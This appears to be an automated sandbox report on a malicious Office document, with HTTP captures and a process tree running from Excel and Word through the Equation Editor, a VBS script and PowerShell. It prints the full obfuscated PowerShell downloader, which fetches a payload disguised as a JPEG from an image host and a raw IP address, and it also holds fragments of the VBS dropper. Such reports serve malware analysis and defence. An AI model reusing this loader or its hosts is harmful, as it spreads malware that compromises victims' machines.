                                                  2024-02-14 07:29:54 UTC1369INData Raw: 6c 44 67 54 72 65 48 51 44 67 54 72 65 54 51 42 6c 44 67 54 72 65 48 51 44 67 54 72 65 61 44 67 54 72 65 42 76 44 67 54 72 65 47 51 44 67 54 72 65 4b 44 67 54 72 65 44 67 54 72 65 6e 44 67 54 72 65 46 59 44 67 54 72 65 51 51 42 4a 44 67 54 72 65 43 63 44 67 54 72 65 4b 51 44 67 54 72 65 75 44 67 54 72 65 45 6b 44 67 54 72 65 62 67 42 32 44 67 54 72 65 47 38 44 67 54 72 65 61 77 42 6c 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 75 44 67 54 72 65 48 55 44 67 54 72 65 62 44 67 54 72 65 42 73 44 67 54 72 65 43 77 44 67 54 72 65 49 44 67 54 72 65 42 62 44 67 54 72 65 47 38 44 67 54 72 65 59 67 42 71 44 67 54 72 65 47 55 44 67 54 72 65 59 77 42 30 44 67 54 72 65 46 73 44 67 54 72 65 58 51 42 64 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4b 44
                                                  Data Ascii: lDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKD
                                                  2024-02-14 07:29:54 UTC1369INData Raw: 74 61 20 3d 20 63 61 69 6e 63 65 6e 74 61 20 26 20 22 6e 76 e2 98 9f c3 b0 2a 28 e2 98 a0 72 22 0d 0a 20 20 20 20 20 63 61 69 6e 63 65 6e 74 61 20 3d 20 63 61 69 6e 63 65 6e 74 61 20 26 20 22 74 5d 3a 22 0d 0a 20 20 20 20 20 63 61 69 6e 63 65 6e 74 61 20 3d 20 63 61 69 6e 63 65 6e 74 61 20 26 20 22 3a 46 72 40 c3 b8 e2 98 9e 40 e2 88 9e 22 0d 0a 20 20 20 20 20 63 61 69 6e 63 65 6e 74 61 20 3d 20 63 61 69 6e 63 65 6e 74 61 20 26 20 22 6d 62 61 e2 87 9d e2 96 91 7d 40 2a 22 0d 0a 20 20 20 20 20 63 61 69 6e 63 65 6e 74 61 20 3d 20 63 61 69 6e 63 65 6e 74 61 20 26 20 22 e2 98 9f c3 b0 2a 28 e2 98 a0 36 34 e2 87 9d e2 96 91 7d 40 2a 74 72 69 6e 67 28 20 24 28 40 28 e2 97 80 28 22 0d 0a 20 20 20 20 20 63 61 69 6e 63 65 6e 74 61 20 3d 20 63 61 69 6e 63 65 6e 74
                                                  Data Ascii: ta = caincenta & "nv*(r" caincenta = caincenta & "t]:" caincenta = caincenta & ":Fr@@" caincenta = caincenta & "mba}@*" caincenta = caincenta & "*(64}@*tring( $(@((" caincenta = caincent


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.2249171104.21.45.1384433636C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-02-14 07:29:57 UTC136OUTGET /images/004/738/994/original/new_image_vbs_updated.jpg?1707769907 HTTP/1.1
                                                  Host: uploaddeimagens.com.br
                                                  Connection: Keep-Alive
                                                  2024-02-14 07:29:57 UTC690INHTTP/1.1 200 OK
                                                  Date: Wed, 14 Feb 2024 07:29:57 GMT
                                                  Content-Type: image/jpeg
                                                  Content-Length: 8369614
                                                  Connection: close
                                                  Last-Modified: Mon, 12 Feb 2024 20:31:47 GMT
                                                  ETag: "65ca8033-7fb5ce"
                                                  Cache-Control: max-age=2678400
                                                  CF-Cache-Status: REVALIDATED
                                                  Accept-Ranges: bytes
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LcxsLkImn7ZW4y0XPXp1znbRxgdHjAlXNXIioOREH88zx179j9wsgqAwTcET1dq4ZsgQGvkC3VFURHQBzEdSpLvECTh3qjrAt%2BE5nKA4Q%2FDxwyKaGzEkeoFeLx01hdnaeDqrD1dRBZrL"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 85539a5d1ff0454c-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-02-14 07:29:57 UTC679INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff fe 00 3b 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 36 32 29 2c 20 71 75 61 6c 69 74 79 20 3d 20 39 35 0a ff db 00 43 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00
                                                  Data Ascii: JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 95CCp"
                                                  2024-02-14 07:29:57 UTC1369INData Raw: 03 11 00 3f 00 ec 41 f5 38 14 9b 87 b9 a8 d9 fd f0 29 0b 64 72 4d 7e cf 63 f2 24 bb 92 97 18 e3 83 4c dd 8f ad 33 70 02 90 9a 18 58 90 b1 f5 14 c2 de 99 35 1e ff 00 41 48 ce 7d 7f 2a 2c 57 a0 f2 7d e9 15 88 61 c8 e3 bd 47 bb 3d e9 a1 8e 70 39 a2 c2 d4 99 f0 5b 23 a7 a5 46 7a f5 e3 d2 9a 5b 07 1d 0d 37 7f bd 26 86 3f 75 37 34 9b 85 34 b6 09 e7 22 98 27 7d 81 8f 4e 73 4d 0d c8 19 f7 a0 91 d4 d2 6d 04 f4 a2 e6 97 1c ed 8f ad 30 b7 eb 41 fa e6 9a 7d 28 b8 58 70 6e 3d 68 ce 7d aa 3a 46 7e 28 b8 0f 63 c9 15 19 3e f4 c6 6e 7d e9 03 64 fb d2 b8 c9 0b 63 f9 53 1b bf 3f 85 21 6e 47 a5 04 e4 e7 b5 17 1a 42 83 8f a5 21 7c 1a 42 c7 1d a9 84 93 45 c6 d0 e2 f9 f6 a6 96 18 e0 e6 9a cd e9 4d 0e 57 b7 e9 45 c9 6b b0 f6 6c 53 0b 1c f3 cd 21 6c f5 a6 1e 09 e7 8a 68 12 b1 26
                                                  Data Ascii: ?A8)drM~c$L3pX5AH}*,W}aG=p9[#Fz[7&?u744"'}NsMm0A}(Xpn=h}:F~(c>n}dcS?!nGB!|BEMWEklS!lh&
                                                  2024-02-14 07:29:57 UTC1369INData Raw: 29 b4 2b 2b 28 f4 c4 86 fa 19 64 79 b5 01 21 2d 70 ad ca a1 5e 83 6f 62 09 f7 15 9d cf a1 fc 7a d6 62 71 ec 26 05 06 3e 33 83 4e 0a 4f 63 52 2a 67 b5 26 c5 62 df 87 f5 eb ff 00 0b df b5 ee 9b 2a c3 72 d1 34 05 99 43 fc 8c 06 ec 02 31 9e 01 cf b5 66 95 2d b9 9d 89 76 c9 24 e4 e4 9e 4f 3f 8f 5a 98 a6 3d 40 f6 a8 8f b7 34 79 96 97 46 47 b7 04 f6 1f af 7c 51 c5 38 02 73 9e 0d 33 69 ce 33 c7 bd 03 4a c3 1b 07 38 38 a6 b4 65 71 90 09 eb ef 53 2e 41 0c 40 38 e6 96 66 32 be ec 63 da 8b 85 ae 56 da 73 e9 df 14 85 3b e2 a4 27 9a 4a 41 62 17 18 14 8a bb fb e3 eb 52 95 19 f6 a8 dd 70 38 eb 4c 08 c8 db df 34 94 1c e7 9a 2a 86 26 71 d3 ad 0c c7 6e 33 c1 e4 d2 d0 29 58 07 da dd 4f 63 3a 4f 6d 2c 90 4c 87 2b 24 67 0c 38 ec 7a f2 0e 0d 46 d9 6c b3 12 4b 72 7b f3 df 27 af
                                                  Data Ascii: )++(dy!-p^obzbq&>3NOcR*g&b*r4C1f-v$O?Z=@4yFG|Q8s3i3J88eqS.A@8f2cVs;'JAbRp8L4*&qn3)XOc:Om,L+$g8zFlKr{'
                                                  2024-02-14 07:29:57 UTC1369INData Raw: 03 14 b4 a1 4b 90 14 12 49 c0 c7 52 69 a7 70 dc 55 23 6d 31 7a e3 34 e9 a0 92 dd ca c8 85 18 73 82 30 79 e9 4c 0b 43 18 f3 c1 f5 a4 a0 f5 a2 a4 41 49 b7 18 a5 a2 90 00 ef f9 51 49 d0 9f 7e 69 73 52 02 30 c8 3e bd 7f 2a 61 07 07 db fc e6 9e 58 7a fb 53 c2 c4 62 72 ce 44 a3 01 40 03 1f 42 73 4d 30 20 28 47 b5 30 8c 75 a9 58 9c 8e 73 4d 35 77 1a d4 4c 71 48 46 29 d4 52 34 1b f8 52 53 99 71 4d a0 06 49 c7 6c 8a 68 19 20 74 cd 48 c3 22 a3 c6 08 3d e9 dc 63 a4 8d a3 23 3d f0 7f 0a 6d 39 9c be 37 12 69 b4 30 b0 51 45 15 24 b4 27 bd 2f 07 a5 14 54 8a c0 e0 29 c0 39 03 bf 6f 53 52 4b 6f 24 0b 13 49 1b 22 ca bb a3 66 e0 32 e7 a8 a8 f1 c8 ed fa d3 9e 59 24 08 1d d9 c2 0d aa 09 c8 51 9c f0 3b 50 2d 86 d0 14 91 9c 71 eb 45 00 9c 11 9e 0d 00 35 8f 4a 4a 07 26 8a a5 d8
                                                  Data Ascii: KIRipU#m1z4s0yLCAIQI~isR0>*aXzSbrD@BsM0 (G0uXsM5wLqHF)R4RSqMIlh tH"=c#=m97i0QE$'/T)9oSRKo$I"f2Y$Q;P-qE5JJ&
                                                  2024-02-14 07:29:57 UTC1369INData Raw: 78 f5 3e d4 84 60 f2 30 7d e9 41 28 41 07 04 50 cc 5c 92 4e 4f 73 4c 76 13 1c 83 e9 4b d6 8e b4 01 9a 4c 96 14 51 40 19 a9 00 a5 e8 69 08 c5 28 c7 7a 00 3a 9f 53 fa d2 93 c7 4a 6d 14 00 53 4f 26 9e 46 06 73 51 f7 eb c5 3b 00 ee bc 54 67 8c f7 a9 8a 32 a0 62 08 0d 9c 66 a3 23 26 90 d0 32 6c 08 72 09 3d 87 6f ad 34 1c 0e 94 b8 c7 7a 36 d0 31 68 a5 03 34 63 9a 00 4c d2 e3 8f 7a 30 70 69 3f 43 eb 40 0a 41 53 cf 06 92 9d 92 ed c9 c9 e0 52 50 02 52 d2 51 40 0a 4e 4d 25 14 50 01 4b d8 d1 8c f6 cd 27 f5 a0 03 a7 b5 3c c8 cd 08 43 ca 83 9c fb 9e c4 d3 29 db c8 52 a0 e0 1e 71 40 00 20 0c 52 d2 75 1d 29 b4 0a c4 d0 95 66 e7 81 44 98 0e 76 fd d3 fa 54 43 fc e2 94 37 18 ed 4b 51 13 5a dd 4b 65 73 15 c4 0e 63 9e 26 0e 92 0e a0 8e 46 3e 86 8b ab 99 6f 6e 65 b8 99 cc 93
                                                  Data Ascii: x>`0}A(AP\NOsLvKLQ@i(z:SJmSO&FsQ;Tg2bf#&2lr=o4z61h4cLz0pi?C@ASRPRQ@NM%PK'<C)Rq@ Ru)fDvTC7KQZKesc&F>one
                                                  2024-02-14 07:29:57 UTC1369INData Raw: 1e 73 e9 59 f2 95 cd a6 84 06 20 dd f8 ab 1a 7d c5 ad a3 ce 6e 6c c5 e0 78 99 50 16 c6 c7 ec c3 e9 e9 4c fb a6 a2 6e fc 71 52 e3 7d 0a 8c fb 95 59 0a e3 27 24 67 9f 6c f4 fc 29 09 dc 0f 3c 54 ae be b5 11 e3 e9 43 89 5c c4 64 1c 54 4c 4e 7d fd aa 7e 49 03 af f2 a6 32 64 e4 71 df 1d 0d 67 cb 62 ae 44 ec 64 cb 1e 4f 1f 87 61 51 b8 c9 03 03 03 8c fa fe 95 af a2 59 e9 57 97 12 c7 ab de cf 61 07 94 4c 72 43 0f 9b 96 03 20 11 91 d4 f7 1f 8d 64 90 4e 33 d4 fb e6 96 fa 58 3a 27 71 98 23 34 d6 e7 f0 a9 48 e6 98 47 07 d6 97 2d f5 05 2b 11 18 9b 1b f1 f2 8e fd b9 f4 a7 45 75 3d ba 4f 1c 52 c9 1c 73 28 49 55 18 81 20 c8 60 08 cf 62 a0 e3 da 9c 77 79 7b 4b 1c 75 c7 6a 41 19 72 06 ec 13 c6 71 ef 59 b5 dc d6 32 b1 58 a8 07 39 cf e1 8a 42 39 ab 37 11 04 90 85 7d e3 d6 a1
                                                  Data Ascii: sY }nlxPLnqR}Y'$gl)<TC\dTLN}~I2dqgbDdOaQYWaLrC dN3X:'q#4HG-+Eu=ORs(IU `bwy{KujArqY2X9B97}
                                                  2024-02-14 07:29:57 UTC1369INData Raw: af 69 e1 8d 6f 55 d1 ef 35 5b 4d 26 fe ef 4a b1 4d d7 37 b1 5b bb c3 00 c8 19 77 00 85 e4 81 92 47 5a c7 62 01 3d ea 53 12 ba dd 06 05 35 93 34 b9 34 31 20 0a 63 63 0e 7b d2 1c f6 a7 9e 94 d2 31 c8 e6 82 2c 46 d4 da 71 5e 49 f5 a6 d3 6a c6 97 10 8a 6e 39 cd 3e 82 b9 e9 52 2d 44 dd d3 d2 95 79 e4 f4 a3 67 bd 38 2f 1c 9a 42 b7 50 18 26 9b 9c 11 e9 4f a4 20 1f ad 22 6e 35 fd 47 43 4d a9 31 81 eb 4d c0 eb de 90 c6 91 8a 5c f1 47 5f 6a 4a 56 13 0f c6 91 85 2d 07 9a a1 0c a4 e0 1a 7e 38 a4 29 4c 62 66 93 22 8c 60 1a 6d 21 8a 06 69 d4 8b 8c d3 8f 26 9d ae 26 46 c4 12 2a 32 31 f4 a7 9e a6 9a 46 69 1a 21 b4 e1 d2 9b d2 95 68 b0 c5 c0 a5 a2 8a 57 10 51 40 19 a3 06 98 08 46 45 20 e2 9d 4d 2a 73 c0 e2 93 57 01 43 98 f0 ca 79 f5 a1 55 ee a4 24 f2 79 3c 9a 6b f4 14 d4
                                                  Data Ascii: ioU5[M&JM7[wGZb=S5441 cc{1,Fq^Ijn9>R-Dyg8/BP&O "n5GCM1M\G_jJV-~8)Lbf"`m!i&&F*21Fi!hWQ@FE M*sWCyU$y<k
                                                  2024-02-14 07:29:57 UTC1369INData Raw: 03 27 38 ef 83 8a 87 38 5e 9f 37 ad 0c 41 01 71 83 eb 48 03 94 f9 7e f2 83 9c 76 34 ce 9e e7 d4 f7 a7 e4 91 d3 81 4d e4 9a 00 50 c7 69 18 07 3c d2 d3 48 c1 e9 8a 4a 60 14 ac 39 f5 1d 69 2a 7b 79 a1 88 c8 66 b7 17 20 a1 55 05 b6 ed 3d 01 e9 ce 3d 0d 20 2b 36 01 3f 97 f2 e2 95 d3 68 1c 83 9e 78 39 e2 93 90 3a e4 f4 e4 63 38 f6 f7 a3 df 02 a8 61 8c 9c 01 9f c2 97 1c fa 52 2b 94 60 c0 e0 8a 7c 8a 11 b3 bb 70 6e 4f b1 a0 69 dc 65 25 1d 68 eb 42 10 30 c0 fc 85 03 a5 48 11 1a 12 de 61 12 e7 01 70 70 47 ae 7a 54 63 8a 05 b1 25 b4 6f 34 f1 c2 9b 43 cc c1 01 73 b4 02 4f 73 d0 63 b9 35 36 a7 a7 be 8f a9 5e d8 5c 98 e5 9e da 47 81 9e 07 de 85 83 60 95 6e 84 1c 13 91 55 18 02 08 c6 41 1d 3b 7b f6 a4 c7 40 09 03 d4 ff 00 85 48 05 2b a1 45 56 e0 e7 b0 e4 fa 72 28 3c 01
                                                  Data Ascii: '88^7AqH~v4MPi<HJ`9i*{yf U== +6?hx9:c8aR+`|pnOie%hB0HappGzTc%o4CsOsc56^\G`nUA;{@H+EVr(<
                                                  2024-02-14 07:29:57 UTC1369INData Raw: 4b 70 6a e2 83 8e e3 f3 a0 b0 ff 00 eb f6 a6 10 00 a9 9e 55 78 76 84 e0 7a 7f 5a 2c 2b 11 b8 ef 8c 7d 69 94 a4 9e 99 cd 25 0b 41 86 06 d3 eb 4a 47 71 d2 92 81 9e 79 a6 0d d8 fd 3f 27 23 af e5 4d dc 3d 79 a6 ee da 28 c8 3c 7f 5a fd 54 fc c0 52 41 3f d6 9a cd cf 14 3f 4c 0e 95 19 c8 a0 64 aa c0 8a 1a a2 59 01 c0 e9 cd 38 9c 9a 96 52 06 27 a7 43 51 96 39 f4 a7 13 c6 3b fa d4 79 e7 d4 fb 55 14 3b 27 14 9d 4d 29 6a 6e 7a d4 dc 60 cd 9e 07 d2 9b 4a 48 22 9a 4e de b4 ee c6 0c 7d e9 9b cd 0e db 87 14 d3 c7 d6 8d f5 01 c5 89 a6 e7 9a 32 7f 1a 6e 69 8f 71 dd 7b 67 14 d2 c0 03 c7 b5 21 6e 7a f2 69 a4 d4 ee 3b 0a c4 1c 71 82 3b d3 77 0a 4d d4 83 19 eb 4f 41 b1 c5 f0 38 18 3e f4 dd f9 ed f9 50 dc 03 de 9b cf a5 48 58 7b 30 e3 1d 69 84 f7 c6 4d 1d e9 ac 79 a2 e5 d8 0b
                                                  Data Ascii: KpjUxvzZ,+}i%AJGqy?'#M=y(<ZTRA??LdY8R'CQ9;yU;'M)jnz`JH"N}2niq{g!nzi;q;wMOA8>PHX{0iMy
                                                  2024-02-14 07:29:57 UTC1369INData Raw: f0 7a 53 1c 77 eb 4a dd 4d 2e 44 45 37 6e 78 03 27 ad 48 41 27 a8 a3 26 3c 15 1c ff 00 3a 42 4c 8c 85 f2 0e 50 97 27 86 e4 0a 60 1c 9f 41 fe 7f 4a b9 2d f1 96 d1 61 28 06 09 39 ee 6a a0 3c 1f cf e9 48 ad c4 00 b6 00 19 3d 3d 73 48 c4 90 46 30 7a 54 d6 f2 08 5c 31 19 e7 38 fc 29 92 c9 e6 39 38 c6 79 fe 75 22 5b 11 03 8a 61 39 3c 8c 0a 97 23 69 f5 a8 c8 a2 d7 1a 18 c3 06 92 94 f2 71 e9 49 cf a5 05 ad 03 3d e8 0d ef ed ed 9f 4c d3 a0 88 4d 3c 51 17 58 83 ba ae f7 e0 2e 4f 24 9f 41 9e 6a e6 bb a5 26 8b a9 cb 69 1d fd b6 a4 88 01 fb 4d 99 cc 6d 91 c8 07 db a1 c5 4f 5b 15 7d 2e 55 56 07 d0 1a 31 92 73 f4 a8 b1 f9 55 80 50 5b 9e 3e 7c e6 80 4f b9 1e de 69 ac 36 d2 6e 3b a8 63 91 4a c3 43 93 c9 00 6e 2c 5b 18 f6 14 d6 c7 f0 d3 29 56 a6 d6 2c 69 53 ef 52 25 c4 ab
                                                  Data Ascii: zSwJM.DE7nx'HA'&<:BLP'`AJ-a(9j<H==sHF0zT\18)98yu"[a9<#iqI=LM<QX.O$Aj&iMmO[}.UV1sUP[>|Oi6n;cJCn,[)V,iSR%


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:08:29:21
                                                  Start date:14/02/2024
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                  Imagebase:0x13f190000
                                                  File size:28'253'536 bytes
                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  General

                                                  Target ID:4
                                                  Start time:08:29:43
                                                  Start date:14/02/2024
                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                  Imagebase:0x13fe60000
                                                  File size:1'423'704 bytes
                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:9
                                                  Start time:08:29:50
                                                  Start date:14/02/2024
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                  Imagebase:0x400000
                                                  File size:543'304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:10
                                                  Start time:08:29:52
                                                  Start date:14/02/2024
                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\loverhappy.vbs"
                                                  Imagebase:0xd80000
                                                  File size:141'824 bytes
                                                  MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:12
                                                  Start time:08:29:54
                                                  Start date:14/02/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreHYDgTreYgBzDgTreF8DgTrebgBvDgTreHYDgTrebwBfDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTre